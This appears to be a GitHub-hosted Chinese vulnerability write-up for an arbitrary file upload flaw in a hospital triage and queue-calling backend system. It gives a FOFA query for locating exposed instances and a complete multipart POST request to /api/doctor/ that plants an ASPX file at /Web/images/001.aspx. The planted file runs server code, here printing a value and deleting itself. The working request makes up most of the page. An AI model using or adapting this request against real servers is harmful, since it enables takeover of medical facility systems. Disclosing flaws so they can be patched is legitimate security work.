分诊叫号后台系统存在任意文件上传漏洞

北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

fofa

title="分诊叫号后台"

poc

POST /api/doctor/ HTTP/1.1
Host: 
Content-Length: 756
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: need_login=
Connection: close

------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="doctorid"

0
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="login_id"

001.aspx
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="name"

22
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="title"

23
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="department"

24
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="icon"; filename="11.txt"
Content-Type: text/aspx

<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
------WebKitFormBoundaryKZ5OA1LLddPA4mKc--

文件上传位置

/Web/images/001.aspx

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

分诊叫号后台系统存在任意文件上传漏洞.md

分诊叫号后台系统存在任意文件上传漏洞.md

分诊叫号后台系统存在任意文件上传漏洞

fofa

poc

Files

分诊叫号后台系统存在任意文件上传漏洞.md

Latest commit

History

分诊叫号后台系统存在任意文件上传漏洞.md

File metadata and controls

分诊叫号后台系统存在任意文件上传漏洞

fofa

poc